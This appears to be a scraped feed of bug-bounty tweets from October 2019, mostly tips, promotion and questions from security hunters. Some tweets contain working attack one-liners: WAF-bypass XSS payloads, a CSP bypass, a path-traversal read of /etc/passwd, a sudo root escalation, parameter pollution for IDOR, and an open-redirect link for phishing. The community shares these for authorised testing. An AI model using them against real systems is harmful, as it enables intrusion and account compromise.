10 cloudflare «XSS» payload to bypass protection. 🦍 {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec
Sanketh Sharath
@sharathsanketh


2019-10-19 02:06:37
1 1st 4 1/2 months of bug bounty hunting: 1st bug-N/A 2nd -Dupe 3rd -Bounty 4th -Dupe 5th -No reply 6th -Dupe 7th -Dupe (this was a P2!) 8th -Won't fix This is tough,need to keep going! I believe tough times don't last! #bugbounty #bugbountytips #bugbountytip
Miguel Gonzales Jimenez
@z3r0cool


2019-10-19 01:39:08
1 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/FyAQ2tDzaL #bugbounty,#bugbountytip
Ishaq Mohammed
@security_prince


2019-10-18 16:15:41
0 @TheR0oT @nightwatch1337 This is one of the nicest #bugbountytip #bugbountytips for the #bugbounty hunters @Hacker0x01 @Bugcrowd @intigriti
Yadhavi
@PrincessYadhavi


2019-10-18 14:44:01
0 Any way to add custom headers to aquatone when screenshotting? #bugbounty #bugbountytips #aquatone #bugbountytip
intigriti
@intigriti


2019-10-18 11:47:03
7 Want to find 'cosmic brain' bugs, just like @0xACB and @samwcyo? 🤯 Use the following 'invisible' ranges in your payloads 👇#BugBountyTip 💥0x00 ➡️0x2F 💥0x3A ➡️0x40 💥0x5B ➡️0x60 💥0x7B ➡️0xFF https://t.co/B2WlIjEJXu
Ishaq Mohammed
@security_prince


2019-10-18 05:06:56
1 HTML5 storage manipulation (stored DOM-based) by @PortSwigger @PortSwiggerRes https://t.co/2DRcHzMwS3 #AppSec #xss #bugbountytip #bugbounty
Gopalsamy ( கோபால்சாமி )
@gopalsamy_


2019-10-18 03:19:31
0 Dear #infosec friends. Give me a suggestion, how you people are running #kalilinux tools on #ubuntu 🤗 please leave a comment below about the method that ur using :) #linux #ubuntu #bugbounty #bugbountytip #redteam #cybersecurity #hacking #hackers
A hacker's life
@Unknownuser1806


2019-10-18 02:43:25
0 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/sR7l2pnYH4 #bugbounty,#bugbountytip
Security Executions Code
@pwn0sec


2019-10-17 16:52:51
1 LIVE with Staf_SecurityPwn @andripwn Penetration Testing Introduction: Exploit & Reconnaissance https://t.co/EWBLAklv8D #bugbounty #bugbountytips #bugbountytip #hackerone #pwn0sec
bugbountytip
@a_l_e_r_t_1_


2019-10-17 06:00:53
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
John mash
@Techhelplistcom


2019-10-17 05:00:01
1 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/fNomAu16P2 https://t.co/R0WwN7R4Ah
Bhojpuri Chumma
@BChumma


2019-10-17 03:04:45
0 RT @cry__pto: i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytip…
👻in🐚
@0xerror


2019-10-17 02:05:13
0 XSS News: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/mMIF2uJKPG, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-10-17 02:05:12
0 Top story: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/GJk0qJDMBC, see more https://t.co/fVnXn9Z0FJ
Ammar Amer🇸🇾
@cry__pto


2019-10-17 01:49:56
2 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/PvL7gXzXKW
Nikhith
@Nikhith_


2019-10-16 19:54:37
0 I just wrote a blog post on #CVE-2019-17662 I found. This is a vulnerability I found in ThinVNC server. An arbitrary file read --> authentication bypass --> Full #VNC access. Can be helpful on a PT / Bug Bounty Read at: https://t.co/ASzbpcGwiE #InfoSec #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-10-16 19:21:33
0 Use the organization field in a ssl certificate to find domain names associated with a company , you can use censys to perform such a task ... #bugbountytip #reconnaissance https://t.co/42vjFALFhq
Karna
@karna__1


2019-10-16 15:30:19
0 I'm serious. It's a #bugbountytip #bugbountytips #infosec #humans https://t.co/F7s0ZB0lFK
bugbountytip
@a_l_e_r_t_1_


2019-10-16 12:57:17
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #bughunters
bugbountytip
@a_l_e_r_t_1_


2019-10-16 10:37:51
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf
bugbountytip
@a_l_e_r_t_1_


2019-10-16 08:52:27
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
m0z
@LooseSecurity


2019-10-15 23:25:51
0 I get asked lots of #BugBounty questions, and one I'm always asked is "Is X valid bug" or "I reported X and it was out of scope". The answer is to read the program's scope before reporting. I know it's not always obvious, but the answer is there... #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-15 17:26:34
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-15 16:04:43
1 The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss https://t.co/BBtdSvmYt6
ironfist
@ironfisto


2019-10-15 15:59:35
0 Not great tip but you might land cassanra cluster in connection tab of datastax studio. Shodan search-> html:datastax #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-15 12:56:16
7 #bugbountytip #bugbounty This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. https://t.co/ODpUpWRypc
Infected Drake
@0xInfection


2019-10-15 11:33:41
1 I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to @har1sec for the assignment. :) #infosec #bugbountytip https://t.co/BnB2fqVdTd
Random Robbie
@Random_Robbie


2019-10-15 06:35:58
2 inside a container.... limited privs? SUDO!!!! https://t.co/ocd7FodNqp sudo -u#4294967295 id uid=0(root) gid=1002(robbie) groups=1002(robbie) sudo -u#4294967295 whoami root #bugbountytip #escapethcontainer
hyperdummy
@dummyclout


2019-10-15 05:15:54
0 ping for vis. any thoughts? #bugbounty #bugbountytip
Pat.
@PuzzledPat


2019-10-15 03:22:57
0 @MacRumors, check out the year 2038 in your iPhone calendar.. notice that #Apple have given July and April some extra months. #bugbountytip https://t.co/Wrk7TEexIS
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-15 03:13:31
0 Morning Like this! #bugbounty #bugbountytip https://t.co/DsshG2nqAw
ً
@GouveaHeitor


2019-10-14 12:51:12
1 If you found a possible IDOR like: http://host/api/AccountID=123 But it is being blocked when you pass an ID from another account, try bypass it making a parameter pollution like: http://host/api/AccountId=123&AccountId=456 #bugbountytip
Ankush Goel
@0xankush


2019-10-14 06:53:27
0 If your are not automating and scripting, you are missing on a lot of fun. It's all about time management in #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-13 18:53:47
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #cybersecurity #ceh #eccouncil #certification https://t.co/0gfcgW7uTM https://t.co/mzllE9lUqq
Ammar Amer🇸🇾
@cry__pto


2019-10-13 16:37:03
7 i have uploaded 74 new articles as a pdf files about different fields of hacking+ linux,cybersecurity,,,etc. to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/XE81lBik5M
Garth Humphreys
@garthhumphreys


2019-10-13 16:16:36
0 #Random thought: Is it #dups or #dupes ? #BugBounty #bugbountytip #infosec
Security Executions Code
@pwn0sec


2019-10-13 15:38:36
0 Bug Bounty ATT : Server-Side Request Forgery (SSRF) https://t.co/hjQLeWxwIS #bugbounty #bugbountytip #bugbountytips #ssrf #hackerone #att
ahamed morad
@Modam3r5


2019-10-13 15:06:47
2 this is one of my reports that I think let me win by the invitation. #bugbountytip https://t.co/fCcnzDat6I
Harsh kumar
@Harshku21974218


2019-10-13 12:37:58
1 Bypassing the WebARX Web Application Firewall (WAF) https://t.co/n09E8OhI2K #cybersecurity #bugbountytip
Evan Custodio
@defparam


2019-10-13 03:02:20
0 By using the boundary "SmuggleThis"+colon I could end the dangling part anywhere in the headers (could be handy). When I went to go check and see if "test.txt" was written to the server I was happy to see I had smuggled my own request and found the CDN headers. #bugbountytip https://t.co/BxYMvBYlsB
ghostlulz
@ghostlulz1337


2019-10-13 02:11:51
0 You know you can turn that SSRF finding into something with devastating impact right? The AWS metadata REST API can be used to steal credentials via SSRF. More information on my blog: https://t.co/2DgWQ2LJkp #infosec #bugbountytips #osint #redteam #aws #bugbountytip #ssrf #hack https://t.co/CCpKLNnF1m
Ashraf
@m0rph1n3e


2019-10-13 01:04:21
0 SPENDING HOURS TESTING MY TARGET FOR CLIENT SIDE VULNERABILITIES, I AM STUCK AT THIS POINT. ANY ADVICE? METHODOLOGY? #bugbounty #bugbountytip #bugbountytips #infosec #xss #ssti #rce #hackerone
Andri Wahyudi 📂
@andripwn


2019-10-12 22:03:00
1 admin live now #bugbounty #bugbountytip https://t.co/VEXedERrSN
Ammar Amer🇸🇾
@cry__pto


2019-10-12 19:33:37
1 automatic screenshot tools,used to take a screenshots to large list of targets to extract useful info like errors that may lead to vulnerabilities -1-EyeWitness: https://t.co/7kbFXmViog -2-HTTPScreenShot: https://t.co/93SafaL5kg -3-Gowitness: https://t.co/YW8bdd75MW #bugbountytip
Rohit Kumar (@rohitcoder)
@rohitcoder


2019-10-12 09:30:44
0 https://t.co/KGbg9IYk2W Bounty: $$$ Thanks to facebook and other programs they're helping me to carry out my startup with these funds. This BugBounty life really helped me alot. #BugBountyTip #BugBounty #Facebook #FacebookBugBounty #Hacker0x01 #EthicalHacking #Hacking
FS
@fsec__


2019-10-12 01:56:49
0 Terminal tips #bugbountytips #bugbountytip #bugbounty https://t.co/dMR3wWBW9c
hacks2learn
@hacks2learn


2019-10-12 00:48:14
0 #ProTip when dropping XSS payloads into a complex dynamic application use breadcrumbs to retrace your steps. I spent 60+ mins trying to find where my hidden pop-up came from... instead use tests like alert("Home->Settings->Profile->Background->Image->NAME_field") #bugbountytip
Garth Humphreys
@garthhumphreys


2019-10-11 20:59:04
0 Gained admin access! #BugBounty #bugbountytip #bugbounties #infosec #appsec #writeup https://t.co/tOKQkuzHax
kaustubh padwad
@s3curityb3ast


2019-10-11 20:46:37
0 One of the best part of @SynackRedTeam is there missions. I rarely got change to grab one. But they are quick they pays and knowledge is bonus from it #bugbounty #bugbountytip #synack https://t.co/kBptrSMaam
Mourad
@SecuAudit


2019-10-11 16:04:53
0 Livechat is the most vulnerable part of a website , you have 85% of chance to find an XSS or IDOR there , if your favorite Bug Bounty program have a livechat support start pentesting it. #bugbountytip #bugbountytips #BugBounty https://t.co/LSwH3IZwY4
Somdev Sangwan
@s0md3v


2019-10-11 12:44:42
1 I performed a little experiment on bug hunters and as it turns out, lot of them are....curious hackers. Tweet 1's statistics are for 12 minutes and Tweet 2's statistics are for 5 minutes. Dear marketers, if you add #bugbountytip, these people will even read food recipes. https://t.co/s6vSo7Yra2
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:09:48
0 Maximise Your Bug Bounty Tutorial 🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops https://t.co/0gfcgW7uTM
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:06:48
0 Maximise Your Bug Bounty —- 🤑🤑🤑 Bug Bounty Tools — 🤩🤩 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/OgAsV7XrzP
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-11 09:13:57
1 And sometimes for (LFI) url?para=//..//..//..//..//..//..//..//..//etc//passwd// Works!! #bugbountytip #BugBounty #bugbountytips #bugbounty
Sudoka
@sudo_sudoka


2019-10-11 04:35:44
0 Today I learn that @binaryedgeio can find many more things than Shodan. I searched for Pulse Secure VPN and found many servers that Shodan not indexes. You should give it a try at https://t.co/AZ43zPOuOW #BugBounty #bugbountytip #infosec #ThreatIntel #recon https://t.co/R0yBjlP0Gz
Murdockz
@Murdockz_CEH


2019-10-11 03:20:28
0 5 hours = 2 Critical 1. Admin ATO 2. GraphQL API privilege escalation Take a step back and learn from your mistakes then come back harder. Writeups soon. #bugbounty #infosec #bugbountytip
Ashraf
@m0rph1n3e


2019-10-10 15:10:32
0 I'VE FOUND API, TOKENS, AND SECRET KEYS. HOW TO VALIDATE BEFORE WRITING A REPORT? I WISH SOMEONE ANSWER ME ASAP. #BugBounty #bugbountytip #bugbountytips #infosec #CyberSecurity #WAF #SSTi #RCE #XSS #DataLeakage
Vincent RATISKOL
@vratiskol


2019-10-10 14:26:18
0 To illustrate my previous post, Burp Session handling tracer showing session validation with macro before sending request @Burp_Suite #bugbountytip https://t.co/F90REmVw0J
Michele Romano
@Mik317_


2019-10-10 14:19:50
2 What endpoints do you control when you come across a WP/Ghost instance? I've found a really good one: /blog/_wpeprivate/config.json, what about you? #BugBounty #bugbountytip
Security Executions Code
@pwn0sec


2019-10-10 12:58:41
1 Android App Penetration Testing #1 https://t.co/mlqVodvKJp #bugbounty #android #app #vulnerability #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 12:45:07
0 Maximise Your Bug Bounty With this Google Dork -- / -- inurl:fisheye AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:https://t.co/lc63NzPGi5 inurl:crucible AND inurl:changelog -site:https://t.co/G9MhGoP7IU -site:http://github #BugBounty #BugBountyTip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-10 11:54:38
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:07:07
1 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/Yytl4wdZn9
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:06:46
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/RQMWrnQNek
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-10 08:06:27
0 Follow Us -- #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/OY9jiDUdDR
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-10 07:30:32
1 Simple Script for scanning ports of all grabbed subdomains using masscan for scan in $(cat <file-path>); do masscan -p1-65535 $(dig +short $scan|grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"|head -1) --max-rate 1000 |& tee port_scan #BugBountyTips #bugbountytip #bugbounty
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-10 06:48:04
0 #BugBountyTip To discover domains deployed on Github for subdomain takeover. Go to https://t.co/oLL4MCjX1S and search for "There isn't a Github Pages site here" Googledork: intitle:"Site not found · GitHub Pages" intext:"There isn't a Github Pages site here"
Iamsaintmalik_
@saintmalik_


2019-10-09 20:30:16
0 Guys am getting this response while trying to load some xss scripts, any help on how I can bypass this @bugbountyforum @stokfredrik @s0md3v #bugbountytips #BugBounty #bugbountytip https://t.co/n3jWvvTt7e
m0z
@LooseSecurity


2019-10-09 19:02:07
3 A quick reminder that my bug bounty challenge site is still live with 2 challenges! The second of which is very advanced (encorporating a WAF). https://t.co/cNYQsVPQ3K #bugbountytips #bugbountytip #bugbounties #bugbountyprogreartip
Rémy Marot
@R_Marot


2019-10-09 19:01:00
0 Simple but useful tool if you only have an index file inside a .git directory (no luck :)) and want to have it human readable : https://t.co/QRHd7CbsYC #bugbountytip
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 18:58:38
0 One liner to import whole list of subdomains into Burp suite for automated scanning! cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s #bugbountytips #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:35:17
0 Free Antivirus Be Like —// Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/XRSvgxtOyT
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-09 17:34:35
2 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/S9CwjVYiHO… #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
Mourad
@SecuAudit


2019-10-09 15:36:58
0 if you find a Form where you need ( Email + Date of birth + Zip code) to login , try to remove Zip code and Date of birth and send the form . #bugbountytip #bugbountytips #BugBounty https://t.co/uVw71NPXLo
tololovejoi
@tolo7010


2019-10-09 13:43:58
0 Question: Can i know how old are you sir? Please answer me Answer: (Please see my replies below): #bugbounty #bugbountytips #bugbountytip
kassih mouhssine
@KassihMouhssine


2019-10-09 13:29:09
0 account takeover write up all what u need is the email of the victim #bugbountytips #bugbountytip #cybersecurite https://t.co/W1DzdvWjST
Sanketh Sharath
@sharathsanketh


2019-10-09 12:57:14
0 Thanks very much @PentesterLand for featuring my blog post/article in your newsletter this week! Was pleasantly surprised. Appreciate it :) This is a lot of motivation for a beginner like me. Cheers! #bugbounty #bugbountytips #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-09 12:47:35
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Mourad
@SecuAudit


2019-10-09 11:11:35
0 Pentesting is becoming Harder and Harder , When I started in 2013 things were different , Now you need to grow your Mindset more than your Skills to Survive and achieve a decent living standard from BugBounty . #bugbounty #bugbountytip #pentesting #hackerone https://t.co/envVq5Lu0Q
Ammar Amer🇸🇾
@cry__pto


2019-10-09 09:03:26
6 Sub-Domain Takeover Tools: -1-SubOver:https://t.co/uzQ2X1rQ2v -2-Subjack:https://t.co/FdytR89u1w -3-autoSubTakeover:https://t.co/TWHTicVKnI -4-tko-subs:https://t.co/Tawtj1NvWc -5-HostileSubBruteforcer:https://t.co/3ydVulWy8l -6-Aquatone:https://t.co/6oxb7sgOhJ #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2019-10-09 07:53:40
2 2 udemy courses about ethical hacking free for a limited time both are 50 hours of useful content + high quality videos.and you will get a certification when finished prove that you finished the course. https://t.co/3xMEpNFL7u https://t.co/oZvixlG4LL #bugbountytip #hacking
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-09 07:07:53
0 Just saw your video on automation for finding 3rd level domains @thecybermentor It was nice!, Can use subfinder instead with -recursive option will do the same right? subfinder -d <domain> -recursive -silent -t 200 -v -o <out-put-file> #bugbounty #bugbountytip
Hritik Sharma
@iamHritikSH


2019-10-09 05:56:22
0 Server parses the XML but the problem is parameter entities are not working and whenever I try to use normal entity the server responds that content is not valid for application/xml, any tips community? #bugbounty #bugbountytips #bugbountytip
Brodie Codie
@brodie_codie


2019-10-09 03:04:35
3 Mood After finding another Bug #hackers #netsec #bugbounty #hacking #redteam #OSINT #recon #offsec #CTF #pentest #bugbountytip #bugbountytips #BrodieCodie #Metasploit #infosec #infosecurity https://t.co/bqwQBo5GVj
m0z
@LooseSecurity


2019-10-08 20:49:41
3 When I started out on my #BugBounty journey a little over 2 years ago, I read all the vulnerabilities on this page (and attempted to make a vuln web app to test some of them): https://t.co/M8VmqRlt8I I hope it helps someone else start their journey. #bugbountytip #bugbountytips
baluz🔥
@haknfuk


2019-10-08 14:42:47
0 If u feel like quitting stop feeling it #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:48:22
0 #bugbountytip if you ever encounter a endpoint filtering ' try \' it may work sometimes :) #sqli
Khaled Mohamed
@xelkomy


2019-10-08 12:42:46
0 awesome machine #hackthebox @hackthebox_eu #bugbountytip https://t.co/RtbEq1u5Z9
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-08 12:15:05
0 Hackers Turn Own Features Against It 🔥💕 #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-08 10:23:58
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-07 16:46:27
0 Seriously don't waste your time on searching for crlf injections, today i scanned nearly 30000+ unique domains and guess how many crlf's i found 0. #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-07 07:17:36
1 XSS Payload '"></title></script><img src=x onerror=confirm(1)> Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-07 06:06:27
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Sudoka
@sudo_sudoka


2019-10-07 04:50:48
0 Koha, the popular open source ILS, has Open Redirect at https://t.co/4FJZI7rSG7. Google Dork for inurl:/cgi-bin/koha/ Then send a request to victims like this: site[.]com/cgi-bin/koha/tracklinks.pl?uri=//phishing.site #bugbounty #bugbountytip #threatintel
Securisec 🚀
@securisec


2019-10-07 00:40:26
2 "RT RT LooseSecurity: Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/bVfEZ0Drd4 #bugbountytips #BugBounty #bugbountytip"
Abood Nour
@AboodNour


2019-10-06 23:35:12
1 Found a better way to search GitHub projects using their own search filters. https://t.co/JJ7sn2DjQj In my case: `filename:file.php libname in:path` increased returned unique results to > 1.2K instead of ~20 returned from similar Google dork #BugBountyTip #BugBounty
m0z
@LooseSecurity


2019-10-06 22:32:42
5 Here's a #XSS write-up describing a specific WAF bypassing method I used to score a bounty a few months ago! https://t.co/NHrtVoOw04 #bugbountytips #BugBounty #bugbountytip
Katie Paxton-Fear
@InsiderPhD


2019-10-06 22:17:04
3 Coming this week: the first video in the 'Finding Your First Bug' series, we're going to look at Business Logic Errors, first we'll look at what they are, how to find them, examples of some real bugs and do a practical with Burp! #BugBounty #bugbountytips #bugbountytip https://t.co/KxOUGVSxR3
RHack
@Queseguridad


2019-10-06 19:38:39
0 Some payloads bypass XSS '"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> CloudFront 1%3C/script%3E%3Csvg/onload=prompt(document[`domain`])%3E Akamai <dETAILS/open/onToGgle=a=prompt,a(45) x> Inperva #Bugbounty #Bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-06 19:11:55
3 Findomain 0.5.0 is out! Now you can also send new subdomain alerts to @telegram! Check out the documentation for a detailed guide on how get it working! https://t.co/VKrEP3eY4d #subdomains #enumeration #monitoring #BugBounty #bugbountytip #reconnaissance #automation #webhooks
Joe Bradshaw
@SnakesNBradders


2019-10-06 17:01:47
0 Want to extend this to the bugbounty community as well for help. #bugbountytip https://t.co/eqYt3M5gFX
Ammar Amer🇸🇾
@cry__pto


2019-10-06 08:01:17
3 during a web pentesting operations when seeing a Registration page you should try register with an existing username, to see if you can enumerate users. this is what i saw on @PayPal you can automate the whole process and get a list of website users. #bugbountytip #hacking https://t.co/WOZYUy4ulH
baluz🔥
@haknfuk


2019-10-06 06:15:57
1 #bugbounty #bugbountytip a channel for coders https://t.co/9JRrkSX6Pe
John mash
@Techhelplistcom


2019-10-06 05:00:01
0 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/fNomAuiIdC https://t.co/waACGyXyHC
Matt Palmer
@mattpalmer_au


2019-10-06 04:44:27
0 1. First Program: Indeed 2. Had difficulties: Google 3. Most used Platform: Bugcrowd and Google 4. Totally hate: 5. Most loved: Automation 6. For beginners: Read, read, read #bugbounty #bugbountytip #bugbountytips https://t.co/EevoSwrDA5
Ammar Amer🇸🇾
@cry__pto


2019-10-06 04:28:06
4 i have uploaded 38 new articles as a pdf files about different fields of hacking to my github repository . enjoy! #bugbountytip #pentest #redteam #osint #Malware #cybersecurity #hacking #infosec https://t.co/q2layzVpKz https://t.co/52Utrc6IMy
Imran nissar
@Imrannissar3


2019-10-05 22:25:11
0 Unexpected behaviour regarding web cache deception attack. Using Account 1 the page is being cached for 1 min and i am able to see all the information in incognito/different browser but When i loggin from a different account the page is not being cached #bugbountytip #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-10-05 19:29:36
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
jub0bs
@jub0bs


2019-10-05 17:15:48
0 #BugBountyTip "[Blind SSRF] cannot be trivially exploited to retrieve sensitive data from back-end systems"... except when forged requests to an attacker-controlled server contain sensitive data (e.g. an API key in headers). Happened to me a few days ago. https://t.co/LTrqNqZ8zK
Nick (@hunt4p1zza)
@ngkogkos


2019-10-05 13:41:01
2 Custom wordlist for file/folder/param fuzzing: 1. Flag interesting requests w/ "WLIST" in Burp constantly 2. Sort requests w/ "WLIST" > HTTP History 3. Use CO2 plugin, send requests to CeWLer & Extract Words 4. Normalize wordlist to ASCII w/ IDE/bash #bugbounty #bugbountytip https://t.co/lazF02od9j
bugbountytip
@a_l_e_r_t_1_


2019-10-05 12:39:03
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Jinone
@jinonehk


2019-10-05 09:57:12
0 <script src="https://t.co/1UvE8Y0fOd)"></script> bypass csp https://t.co/Jt9xQeag4g #BugBounty #BugBountyTip #WAF https://t.co/nz2OYbKBGx
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:14:53
0 Silent omission of certificate hostname verification in LibreSSL and BoringSSL Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hackerone https://t.co/A2EJ8bgNyP
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:13:13
0 Malware Analysis 101 - Sandboxing Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/TXX3kDeuhe
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:09:35
0 Pushing Left, Like a Boss: Table of Contents Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Xs9P4t11CR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:08:16
0 Red Teamer’s Guide to Pulse Secure SSL VPN Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/7qf0K4KUKR
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-04 21:04:53
2 Download predictions details of ads plans of any business. Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/nj3z2KLprL
Nick (@hunt4p1zza)
@ngkogkos


2019-10-04 19:20:20
0 This is the bash function I use for #bugbounty on a target. Although I use checklists, enforcing organization via the filesystem forces me to do a good/clean job & serves as a 2nd checklist. Also, helps w/ being more efficient, as you can tailor cheatsheets/scripts. #bugbountytip https://t.co/B7gq2pvaZW
bugbountytip
@a_l_e_r_t_1_


2019-10-04 15:50:17
0 Chrome ❎ Firefox ✅ #Bugbountytip https://t.co/nB1NqVdEPK
Ammar Amer🇸🇾
@cry__pto


2019-10-04 13:37:36
